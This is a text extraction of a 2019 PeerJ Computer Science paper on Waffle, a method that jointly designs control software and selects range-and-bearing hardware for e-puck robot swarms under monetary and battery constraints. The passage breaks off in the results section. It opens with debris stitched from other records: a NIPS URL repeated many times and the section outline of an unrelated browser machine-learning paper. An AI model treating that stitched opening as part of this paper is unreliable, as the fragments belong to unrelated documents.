http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/4006-parallelized-stochastic-gradient-descent.pdf http://dx.doi.org/10.7717/peerj-cs.11 MLitB: machine learning in the browser Introduction MLitB: Vision Ubiquitous machine learning Cheap distributed computing Reproducible and collaborative research MLitB: Prototype Why JavaScript? General architecture and design Events and software behavior ML use-case: deep neural networks Scaling behavior of MLitB Walk-through of MLitB prototype Limitations of MLitB prototype Related Work Volunteer computing JavaScript applications Distributed machine learning Opportunities and Challenges Challenges Opportunities Future MLitB Development Visual programming Machine learning library GPU implementations Design of research closures Conclusion References work_q76lim7slzbszgspybrze23f3y ---- Submitted 2 July 2019 Accepted 28 August 2019 Published 30 September 2019 Corresponding author Mauro Birattari, mbiro@ulb.ac.be Academic editor José Manuel Galán Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.221 Copyright 2019 Salman et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Concurrent design of control software and configuration of hardware for robot swarms under economic constraints Muhammad Salman, Antoine Ligot and Mauro Birattari IRIDIA, Université Libre de Bruxelles, Brussels, Belgium ABSTRACT Designing a robot swarm is challenging due to its self-organized and distributed nature: complex relations exist between the behavior of the individual robots and the collective behavior that results from their interactions. In this paper, we study the concurrent automatic design of control software and the automatic configuration of the hardware of robot swarms. We introduce Waffle, a new instance of the AutoMoDe family of automatic design methods that produces control software in the form of a probabilistic finite state machine, configures the robot hardware, and selects the number of robots in the swarm. We test Waffle under economic constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. Experimental results obtained via realistic computer-based simulation on three collective missions indicate that different missions require different hardware and software configuration, and that Waffle is able to produce effective and meaningful solutions under all the experimental conditions considered. Subjects Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Artificial Intelligence, Robotics Keywords Swarm robotics, Automatic design, Collective behaviors, Concurrent design INTRODUCTION In this paper, we make a two-fold contribution: (i) we address the concurrent automatic design of control software and the automatic configuration of the hardware; and (ii) we study an automatic design problem that is subject to economic constraints. In swarm robotics (Şahin, 2004), a group of robots coordinate to accomplish missions that a single robot cannot accomplish. In a swarm, robots do not have predefined roles, neither do they possess any global information, nor do they rely on external infrastructures (Dorigo, Birattari & Brambilla, 2014). They operate in a decentralized and self-organized manner, relying only on local information gathered through their sensors or communicated by their neighboring peers. A robot swarm is a collective entity and cannot be programmed directly: the designer must program the individual robots so that, together, they perform the desired mission. The design process is laborious due to the complex relation existing between the behavior of the individual robots and the collective behavior that results from their interactions (Brambilla et al., 2013). The most common approach to designing a robot swarm is trial-and-error: a time consuming approach in which individual-level behaviors are implemented, tested, and modified until How to cite this article Salman M, Ligot A, Birattari M. 2019. Concurrent design of control software and configuration of hardware for robot swarms under economic constraints. PeerJ Comput. Sci. 5:e221 http://doi.org/10.7717/peerj-cs.221 mailto:mbiro@ulb.ac.be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.221 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.221 the desired swarm-level behavior is obtained. Although a number of swarms have been successfully designed with this approach, it heavily depends on the experience of designer, it is error-prone, and its results are not reproducible. To overcome these issues, a number of principled manual design methods have been proposed. However, these methods are limited in scope: a universal swarm design methodology does not exist, yet (Hamann & Wörn, 2008; Lopes et al., 2016; Brambilla et al., 2015). Automatic design is an alternative approach to designing a swarm. In automatic design, the design problem is formulated as an optimization problem that is then solved with an optimization algorithm (Birattari et al., 2019). A design problem of a collective mission is expressed as an objective function, a mathematical equation that measures the performance of the robot swarm. An optimization algorithm steers the search for a control software of an individual-robot that maximizes the performance of the swarm, taking into account the constraints such as hardware limitations of the robots or other environmental restrictions, that are encoded in the form of additional (in)equalities. Neuro-evolutionary robotics is the most studied among the existing automatic design approaches to design a swarm (Trianni, 2008). This approach uses an evolutionary algorithm to optimize the control software of robots that, in this case, is represented by an artificial neural network (Nolfi & Floreano, 2000). Recently, a number of automatic design approaches have been proposed that use different control software structures and optimization algorithms than those typically adopted in evolutionary swarm robotics (Francesca et al., 2014). The concurrent development of control software and hardware is a further step to reduce the human involvement in the design process. A number of concurrent design methods have been proposed for single-robot applications: in addition to designing the control software, they select and configure sensors and actuators and/or the robot’s morphology (Sims, 1994; Lipson & Pollack, 2000). These concurrent design methods have significantly increased the performance and versatility of the designed robots. In swarm robotics, only a few research articles have been published that studied the concurrent automatic design of control software and configuration of the hardware (Watson & Nitschke, 2015). Details are provided in the STATE OF THE ART section. In general, designing implies solving trade-offs, that is, balancing multiple, possibly conflicting factors (Pahl et al., 2007). In swarm robotics, a characterizing example of a trade-off to be handled is the one between the number of robots comprised in the swarm and the capabilities of each individual robot. The designer must decide whether, for the specific mission at hand, they should use (i) few highly capable robots or (ii) many relatively incapable ones. This trade-off originates from the constraint of a limited monetary budget. Indeed, it is reasonable to assume that highly capable robots are more expensive than relatively incapable ones. Another example of a design trade-off originates if the designer is given the constraint of adopting a battery of a predefined capacity. Under this constraint, the designer might chose to adopt (i) robots with powerful sensors and actuators that can achieve relatively more per unit time, but have a high power consumption and therefore can operate for a relatively short amount of time; or (ii) simpler robots that can achieve relatively less per unit time but have a low power consumption and therefore can operate Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 for a relatively long amount of time. It is reasonable to expect that the choice might depend on the specific mission at hand. In this research, we introduce Waffle, a new instance of the AutoMoDe family of automatic design methods. All previously published instances of AutoMoDe generate control software for the e-puck platform (Mondada et al., 2009) by selecting, combining, and fine-tuning predefined, mission-independent software modules (Francesca et al., 2014; Francesca et al., 2015; Kuckling et al., 2018; Hasselmann, Robert & Birattari, 2018). Waffle is based on Chocolate (Francesca et al., 2015). Indeed, regarding the conception of control software, Waffle is identical to Chocolate: the two methods share the same predefined software modules, they combine these modules into the same control software architecture, and they use the same optimization algorithm—details are given in the AUTOMODE- Waffle section. The novelty of Waffle is the concurrent hardware configuration of the robot swarm: Waffle automatically selects the hardware configuration of the individual robots and the number of robots within the swarm. The goal of this research is to show that it is possible to concurrently design the control software and configure the hardware for robot swarm using the principles of automatic modular design: the idea that control software and, in our particular case the hardware, can be produced by combining pre- existing modules that are mission independent and that are assembled and fine tuned automatically. In this specific study, we consider some hypothetical hardware modules that enable a robot to detect and locate its neighboring peers. These hypothetical modules are based on infrared transceivers and are variants of an existing hardware module for the e-puck platform (Mondada et al., 2009) known as the range-&-bearing (Gutiérrez et al., 2009). We define the set of these hypothetical modules so that some of them are more-capable and some are less-capable than the existing one in terms of perception range and detection abilities. We assume that the more capable hardware modules are more expensive and consume more power. These hypothetical modules are realistic and possibly implementable. The fact that they are hypothetical (except one) does not impair the significance of our research. Indeed, our goal is not to solve a specific design problem but rather to show that a modular approach to designing by optimization can search the space of possible hardware configurations concurrently with the automatic design of control software. We study Waffle under what we shall collectively call economic constraints, namely, constraints on the total monetary budget available and on the battery capacity of each individual robot comprised in the swarm. If these constraints were not included, the study would produce trivial results in many cases. Indeed, in many cases, the automatic design process would produce swarms comprising the largest number of robots possible, each equipped with the best performing, most expensive, and most energy-consuming hardware modules. Besides preventing that the study produces trivial results, these constraints have a value on their own. Indeed, in a prospective practical application of automatic design, one will be necessarily faced with economic constraints, which are an essential, unavoidable element of any real-world design problem. To the best of our knowledge, this study is the first one in which automatic design of robot swarms is studied under constraints of economical nature. In this sense, our work contributes to moving a step in the direction of the practical application of automatic design. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 The main research question that we address in this paper is the following: can Waffle select mission-specific hardware together with an appropriate control software? To do so, we test Waffle on three different collective missions: End-Time-Aggregation, Anytime- Selection, and Foraging. For each mission, we impose constraints to the design process. Namely, we impose a monetary budget and/or a battery capacity. For each mission, we perform nine different experiments: (i) one experiment in which both monetary budget and battery capacity are unconstrained (No-Constraint), (ii) two experiments with different levels of the monetary budget and unconstrained battery capacity (Monetary-Constraint), (iii) two experiments with different levels of battery capacity and unconstrained monetary budget (Power-Constraint), and (iv) four experiments with different levels of monetary budget and battery capacity (Monetary-&-Power-Constraint). For each experiment, we report and discuss (i) a measure of the performance achieved, (ii) the number of robots comprised in the automatically designed swarm, (iii) which hardware modules have been automatically selected, and (iv) which software modules were adopted. STATE OF THE ART In the literature, a number of approaches have been proposed to address the concurrent design of single robots. However, only a few preliminary studies have been published that implement the simultaneous design of hardware and control software for a robot swarm. In single robot applications, Sims (1994) introduced what he called virtual creatures: simulated robots whose body and control software are designed simultaneously to perform different tasks, such as walking, jumping, and swimming. The body of these robots is composed of solid cuboid segments connected by different joint types, actuators to simulate muscle force at joints, and various sensors. The body of a robot is represented as a directed-graph of nodes and connections that contain the connectivity information and developmental instructions. The control software of the robot is implemented as an artificial neural network. A genetic algorithm was used to concurrently design the software and the hardware of a robot for a particular task. The development of virtual creatures demonstrated the ability of this approach to design complex systems that would be complicated to design using traditional methods. Lipson & Pollack (2000) took this concept to a further level by introducing the automatic manufacturing of the concurrently designed robot. The authors used the rapid prototyping technology to 3D print the robot once its body (variable-length bars, and ball-and-socket joints) and control software (artificial neural network) is automatically designed in the simulation. In recent studies, much work has been conducted using similar approaches that aim to address various design problems, e.g., robots with insect-like hardware topologies and behaviors (Hornby, Lipson & Pollack, 2003); visually guided robots (Macinnes, 2003); aquatic robots (Clark et al., 2012); self-reconfiguring robot (Nygaard et al., 2018). In swarm robotics, only a couple of studies are available that use concurrent design methods to design a robot swarm. Watson & Nitschke (2015) studied the impact of the number of sensors and their position on the robot to select the minimal sensor configuration of individual robot for a collective construction task. They achieved that by manually Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 selecting six different sensors configurations and generating six instances of control software in the form of artificial neural networks using HyperNeat. Hewland & Nitschke (2015) used NEAT-M to configure the number and types of sensors simultaneously with the control software for the robots in a swarm for collective construction task. Moreover, they also designed the control software for a robot swarm with fixed hardware configuration. According to the authors, the concurrently designed swarm performed relatively better than the swarm with fixed hardware configuration. Heinerman, Rango & Eiben (2015) studied the relationship between individual and social learning in physical robot swarms. The authors used six Thymio II robots in their experiments. The study shows that the on-line social learning in a physical robot swarm is possible, the design process is faster than individual learning, and the performance of the produced control software (artificial neural networks) is higher. Moreover, the design process also configures a suitable sensory layout for individual robots. Various computational models have been proposed to estimate the impact of the size/density of the robot swarm on its performance (Lerman & Galstyan, 2002; Hamann, 2012). However, we are not aware of any study in which the automatic selection of the number of robots for a swarm has been attempted. To the best of our knowledge, the implications of imposing economical constraints to the automatic design of a robot swarm have never been studied. We are only aware of a single study that goes into that direction: recently, Carlone & Pinciroli (2019) included some practical constraints in the design of a robot swarm. They formulate the co-design of a single race-drone and multi-drone system as a binary optimization problem that allows specifying constraints such as the total design budget. AUTOMODE-WAFFLE As already mentioned above, Waffle belongs to AutoMoDe, a family of off-line automatic methods for designing the control software of robot swarms (Francesca et al., 2014). In AutoMoDe, control software is generated by automatically assembling predefined modules and by fine-tuning their free parameters. A number of methods have been proposed that belong to AutoMoDe: Vanilla (Francesca et al., 2014), Chocolate (Francesca et al., 2015), Gianduja (Hasselmann, Robert & Birattari, 2018), and Maple (Kuckling et al., 2018). Each of these methods is characterized by a specific set of predefined modules, a software architecture into which these modules can be combined, and an optimization algorithm that searches the space of the possible ways in which modules can be combined into the given architecture and the space of the free parameters. All the aforementioned methods generate control software for a specific version of the e-puck platform (Mondada et al., 2009). Moreover, they all limit themselves to the generation of control software: the hardware configuration of the e-puck robot is fixed and the number of robots comprised in the swarm is given as a requirement of the mission to be performed. Waffle is a further step to increase the flexibility of AutoMoDe and to reduce the human involvement in the design process. Indeed, Waffle concurrently develops the control software and configures the hardware of the robot swarm—including the number Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 5/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Table 1 Low-level behaviors and conditions used in Waffle. Low-level behaviors Exploration The robot moves straight. If an obstacle is detected, the robot rotates in place for a random amount of time before moving straight again Stop The robot does not move Phototaxis The robot moves towards the light, if perceived; otherwise, it moves straight Anti-phototaxis The robot moves away from the light, if perceived; otherwise, it moves straight Attractiona The robot moves towards peers within its perception range Repulsiona The robot moves away from peers within its perception range Conditions Black-floor Black floor is detected Gray-floor Gray floor is detected White-floor White floor is detected Neighbor-counta The number of peers in neighborhood is greater than a parameter Inverted-neighbor-counta The number of peers in neighborhood is less than a parameter Fixed-probability The transition is enabled with a fixed probability Notes. aBehaviors and conditions that use the range-&-bearing module. of robots comprised. Regarding the design of control software, Waffle is identical to Chocolate (Francesca et al., 2015): the two methods share the same set of pre-defined software modules; generate control software in the form of probabilistic finite state machines; and use the Iterated F-race optimization algorithm (López-Ibáñez et al., 2016) to select, combine, and fine-tune the software modules. The set of software modules is composed of six low-level behaviors and six conditions (Francesca et al., 2015). A behavior is an operation or action that a robot can perform, while a condition is a criterion to switch from one behavior to another. Behaviors and conditions have parameters that impact their internal functioning: AutoMoDe fine-tunes these parameters to the specific mission to be performed. Multiple instances of the same behavior might coexist in a probabilistic finite state machine, possibly with different values of the parameters. In Waffle (as in Chocolate), states and edges of a probabilistic finite state machine are instances of behaviors and conditions, respectively. The design process can include a maximum of four states and each state can have at most four outgoing edges. A brief description of the software modules is given in Table 1 and a typical probabilistic finite state machine is shown in Fig. 1. Regarding the hardware, Waffle uses Iterated F-race to define the configuration of the individual e-puck robots and their number within the swarm. The e-puck is a differential drive robot that is widely used in swarm robotics research (Mondada et al., 2009). Waffle and all previous instances of AutoMoDe operate with an extended version of the e-puck robot, which adopts: (i) the Overo Gumstix, to run Linux Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 6/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Figure 1 A typical probabilistic finite state machine automatically designed by Waffle: states and conditions are represented by circles and diamonds, respectively. Initially the robot moves towards its neighboring peers (attraction state)—the robot follows a direction vector and att = 4.81 is the attraction parameter that defines the magnitude of the vector. When it detects the black floor, it stops. The param- eter p is the probability of transition from one state to another when the condition is true. We refer the reader to Francesca et al. (2014) for further details. Full-size DOI: 10.7717/peerjcs.221/fig-1 on the robot, (ii) three ground sensors, located under its body, to detect the gray-level color of the floor beneath it, and (iii) a range-&-bearing module (Gutiérrez et al., 2009) to detect neighboring peers and have knowledge of their relative position. We simulate the e-puck robots using ARGoS (Pinciroli et al., 2012; Garattoni et al., 2015), an open source multi-engine simulator for robot swarm. We use ARGoS’ 2D dynamic physics engine to simulate the robots and the environment. Here, we assume that e-puck robots are formally described by reference model RM 1.1 (Hasselmann et al., 2018), which defines the input and output variables of corresponding sensors and actuators—see Table 2. These variables can be read/written by the control software at every control step, that is, every 100 ms. The control software detects the obstacles (proxi) and the presence and relative position of a light source (light i) using eight infrared transceivers. It also detects the gray-level color of the floor (groundj) beneath the robot using ground sensors. At every control step, all robots in the swarm broadcast a ‘‘heartbeat’’ signal using their range-&-bearing module. This signal encodes the sender’s unique ID. Every robot receives the heartbeat signals of the peers that are in its perception range and has therefore knowledge of their number (n), and of their aggregate relative position (V ) which is defined as: V =   n∑ m=1 ( 1 1+rm , 6 bm ) , if robots are perceived; (1, 6 0), otherwise. (1) Here, rm and bm are the range and bearing of the mth neighboring peer, respectively. For a detailed description of the vector V and of how it is computed, see Salman, Ligot & Birattari (2019). Eventually, the control software actuates the wheels of the robot by setting the right and left wheel velocity (vr and vl). Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 7/21 https://peerj.com https://doi.org/10.7717/peerjcs.221/fig-1 http://dx.doi.org/10.7717/peerj-cs.221 Table 2 Reference model RM 1.1. Sensor Input Value Description Proximity proxi∈{1,...,8} [0,1] reading of proximity sensor i Light light i∈{1,...,8} [0,1] reading of light sensor i Ground groundj∈{1,2,3} {black,gray,white} reading of ground sensor j Range-&-Bearing n [0,29] number of neighboring robots perceived V ([0.5,30],[0,2π]) their aggregate position Actuator Output Value Description Motors vk∈{l,r} [−0.12,0.12] ms−1 target linear wheel velocity As mentioned above, the goal of this research is to concurrently develop the control software and configure the hardware for the robot swarm. Concerning the hardware configuration, Waffle configures the range-&-bearing transceiver modules of e-puck robots. To do so, we simulate six range-&-bearing receivers and two range-&-bearing transmitters as listed in Table 3. These range-&-bearing modules are hypothetical but are variants of one that actually exists (Gutiérrez et al., 2009): receiver R3rb coupled with transmitter T1rb, as defined in Table 3. Each hypothetical range-&-bearing receiver and transmitter has distinct characteristics. A receiver is characterized by an error modeled as white noise in the estimation of the angle of a broadcasting peer (bearing error), and a probability to fail to receive the signal broadcast by a robot in its perception range (loss probability). The bearing error is sampled at every time step from a uniform distribution. The loss probability is a function of the number of neighboring peers—details are given as supplementary material (Salman, Ligot & Birattari, 2019). A range-&-bearing transmitter is characterized by a tunable infra-red transmission range (R)—see Table 3. If the design process finds the range-&-bearing necessary for a mission, it can equip all the robots with one of the receiver and of the transmitter configurations listed in Table 3. In configuring the hardware of the robot swarm, the design process must also respect the available monetary budget and/or a battery capacity. Indeed, the range-&-bearing receivers and transmitters are also characterized by price and current rating—see Table 3. EXPERIMENTAL SETUP In this section, we describe the three collective missions, the experiments we perform for each mission, and the protocol we follow to test Waffle. Missions We test Waffle on three missions: Anytime-Selection, End-time-Aggregation, and Foraging. All three missions are to be performed in a dodecagonal arena of 4.91 m2. The arena is divided into different zones according to the requirements of a mission. Anytime-Selection and End-time-Aggregation are performed in the same arena—as shown in Fig. 2A. At the beginning of every experimental run, we randomly position the robots everywhere in the arena. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 8/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Table 3 Extended range-&-bearing receiver and transmitter modules. The bearing error is modeled as white noise in the estimation of the bearing of a broadcasting peer and is sampled from a uniform proba- bility distribution, of which we list here the extremes of the support. The loss probability is a function of the number of neighboring peers, of which we list here the minimum, average, and maximum values. Range-&-bearing Bearing error Loss probability Price Current rating Receivers Rxrb ± deg min−avg −max Px (€) Ix (mA) ∅ − − 0 0 R1rb 45 0.75−0.84−0.95 500 10 R2rb 30 0.75−0.85−0.90 600 15 R3rb 25 0.75−0.80−0.93 700 20 R4rb 20 0.70−0.78−0.85 800 25 R5rb 15 0.50−0.64−0.75 900 30 R6rb 5 0.40−0.57−0.70 1,000 35 Range-&-bearing Range Price Current rating Transmitters Tyrb R (m) Py (€) Iy(R) (mA) ∅ − 0 0 T1rb {0.6,0.7,0.8} 400 {20, 30, 40} T2rb {0.9,1.0} 600 {50, 60} Figure 2 ARGoS representation of arenas with dimensions and positions of different zones: (A) End- time-Aggregation and Anytime-Selection, and (B) Foraging. Measurements are expressed in me- ters. In Foraging, L represents a light source. Full-size DOI: 10.7717/peerjcs.221/fig-2 Anytime-Selection The robot swarm must aggregate in one of the two circular black zones. The size of two black zones and their position in the arena are given in Fig. 2A. The performance of the swarm is measured by the following objective function: FA= T∑ t=1 ∣∣(Na(t)−Nb(t))∣∣, (2) Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 9/21 https://peerj.com https://doi.org/10.7717/peerjcs.221/fig-2 http://dx.doi.org/10.7717/peerj-cs.221 where Na(t) and Nb(t) are the number of robots in zone a and b at any time t; T is the total duration of the experiment. In Anytime-Selection, the performance is measured at every control step. Due to this reason, the robots are expected to promptly aggregate in one of the black zones and stay there until the end of the experiment. End-time-Aggregation The robots must aggregate in one of the two black zones. The dimensions of two black zones and their position in the arena are given in Fig. 2A. The performance of the robot swarm is measured with the following objective function: FE = ∣∣Na(T)−Nb(T)∣∣, (3) where T is the duration of an experiment and Na(T) and Nb(T) are the number of robots in zone a and zone b at time T . Unlike Anytime-Selection, the performance in End-time-Aggregation is computed at the end of the experiment. Due to this reason, the robots can take some time to explore the arena and converge in a black zone: the experiment duration is not a significant constraint in this mission. However, the real challenge is to keep the robots assembled in a zone until the end of the experiment. Foraging The swarm must collect a maximum number of objects from two sources and drop them in the nest. We abstract the Foraging experiment by considering that an object is retrieved when an individual robot visits a source, and an object is dropped when a robot visits the nest. The two sources in the arena are represented as two black zones, while the nest is represented as a white zone. A light is also placed behind the nest as a cue for robots. The dimensions and position of the two source zones and nest are given in Fig. 2B. The performance of the robot swam, the number of objects (No) retrieved by the swarm, is expressed by the following objective function: FF =No. (4) In Foraging, an individual robot can retrieve a single object at a time. Therefore, the performance of the swarm heavily rely on the number of robots and on the duration of the experiment. Experiments We perform nine different experiments for each mission. In these experiments, we impose a monetary budget and/or a battery capacity constraints to the design process. Depending on the type of constraint, an experiment can be classified as belonging to one of four categories: No-Constraint, Monetary-Constraint, Power-Constraint, and Monetary-&- Power-Constraint. The levels of the monetary constraint, levels of battery capacity, and duration of the experiments are listed in Table 4. For each experiment, the design process is free to choose any number of robots between 15 and 30. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 Table 4 Monetary budget levels, battery capacity levels and duration of all nine experiments of four categories. The duration of an experiment, T , from categories Power-Constraint and Monetary-&-Power- Constraint is not fixed. The experiment terminates, when all robots are out of battery—as defined in Eq. (7). Experiment Category Monetary budget Battery capacity Duration NC No-Constraint unconstrained unconstrained 500 s M80 80,000€ unconstrained 500 s M60 Monetary constraint 60,000€ unconstrained 500 s P20 unconstrained 20 mAh T P15 Power constraint unconstrained 15 mAh T M80P20 80,000€ 20 mAh T M80P15 80,000€ 15 mAh T M60P20 60,000€ 20 mAh T M60P15 Monetary & power constraint 60,000€ 15 mAh T No-constraint This experiment (NC) is performed without any constraint: the monetary resources and battery capacity are unconstrained. Monetary-constraint In these experiments, the limited resource is the monetary budget, Mlimit , available to purchase the robots and range-&-bearing modules. The design process only considers the combinations of hardware modules that keep the total cost of the swarm, Pswarm, equal or below the available monetary budget—i.e, Pswarm≤Mlimit . The total swarm cost, Pswarm, is computed with the following equation: Pswarm=N × ( Pr +Px+Py ) , (5) here N is the total number of robots in swarm, that is, 15 to 30 robots; Pr is the price of extended version of e-puck without range-&-bearing modules, that is, 2,000€; Px and Py are the prices of a range-&-bearing receiver and a range-&-bearing transmitter respectively—see Table 3. The minimum cost of a swarm is 43,500€, when the minimum number of 15 robots are equipped with the least-capable range-&-bearing receiver and transmitter modules. The maximum cost of a swarm is 108,000€, when the maximum number of 30 robots are equipped with the most-capable range-&-bearing receiver and transmitter modules. For each mission, we perform two experiments, M80 and M60, where the monetary budget is 80,000€ and 60,000€ respectively—see Table 4. Power-constraint In these experiments, the limited resource is the battery capacity, Pbc. There is no constraint on the monetary resources: the design process can choose any combination of the range-&- bearing modules and the number of robots between 15 and 30—see Table 4. The operation time, Tr, of each robot in the swarm depends on its hardware configuration, available battery capacity, and the execution of the individual-level behaviors. The operation time Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 of a robot can be computed by the following equation: Tr = (Pbc×3600) (Icpu+Ilm+Irm+Iy(R)+Ix) , (6) where Icpu is the current rating of robot’s cpu and other fixed sensors, that is, 100 mA. The CPU and other fixed hardware modules will always consume the same power. Ilm and Irm are the current ratings of the left and the right motors of the robot, that is, 150 mA at maximum speed. Ix and Iy(R) are the current ratings of range-&-bearing receiver and transmitter modules respectively. R is the range of range-&-bearing transmitter—see Table 3. The experiment terminates, when every robot in the swarm consumes its battery power. The total experiment time, T , is expressed as: T =max ( Tr∈{1,2,3,...,N} ) . (7) For each mission, we perform two experiments with different levels of battery capacities: P20 and P15—see Table 4. Monetary-&-Power-Constraint In these experiments, both monetary budget and battery capacity are limited. The design process is required to choose the hardware modules that are not only affordable but also allow robots to operate for a sufficient amount of time. For each mission, we perform four experiments with dual constraints: M80P20, M80P15, M60P20, and M60P15—see Table 4. Protocol The experiments are performed without any human intervention. The design of control software and the configuration of hardware is the result of an automatic design process. For each experiment, we run 20 independent design processes to get 20 hardware configurations and their respective control software in the form of a finite state machine. Each design process is run with the design budget of 50,000 simulations. The performance of the designs are evaluated via a single run of each design. For each experiment, we report (i) the performance achieved by the swarm, the number of robots comprised in the automatically designed swarm, the hardware modules that have been automatically selected, and the adopted software modules. RESULTS In this section, we present the results on a per-mission basis. The instances of control software generated, the data collected, and videos of the experiments are available as online supplementary material (Salman, Ligot & Birattari, 2019). Anytime-Selection The performance of an automatically designed swarm depends on the number of robots that reach the black zone and on the moment in which each of them does so: the longer a robot remains on the black zone, the higher the contribution it makes to the score. As a result, the duration of the experiment has an impact on the performance: the longer the experiment, the longer the robot can remain on the black zone and contribute to the score. Salman et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.221 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.221 When economical constraints are imposed, the design process tends to select low-tier hardware; and designs the control software such that the robots move less and save battery life for a longer experiment duration. No-constraint Waffle tends to configure robot swarms whose total cost is close to the maximum possible—see Fig. 3D. Indeed, the robot swarms comprise 25 to 30 robots—see Fig. 3G— equipped with high-tier range-&-bearing receivers and transmitters—see Fig. 4. At visual inspection, the robots first form clusters and then slowly converge on a black zone: when the robots find a black zone, they spin in place and block the way for the remaining robots, which are therefore unable to enter the zone. This behavior is obtained with Exploration, Stop, and Attraction—see Fig. 5A. As expected, the performance of the swarm is considerably better than the one achieved when constraints are imposed—see Fig. 3A. Monetary-constraint Under the constraints imposed by M80 and M60, Waffle tends to configure the robot swarm so that the total cost is close to the maximum available budget—see Fig. 3D. The number of robots in the swarm decreases proportionally to the monetary budget—see Fig. 3G. The robots are equipped with high-tier range-&-bearing receivers and long-range range-&-bearing transmitters. In M60, however, Waffle also selects two low-tier range-&- bearing receivers—see Fig. 4. The robot swarms designed under NC and M80 behave in a similar way. In M60, however, the robots prefer to use the Attraction low-level behavior to remain in a black zone, but as the robots are equipped with low-tier range-&-bearing 